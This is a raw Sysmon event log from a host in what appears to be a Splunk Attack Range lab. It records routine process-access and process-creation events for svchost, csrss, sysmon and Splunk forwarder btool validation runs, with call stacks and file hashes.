13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.743{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.702{59A5CD1D-8EE5-6005-C800-00000000A301}48964824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8EE5-6005-C700-00000000A301}39043724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.454{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 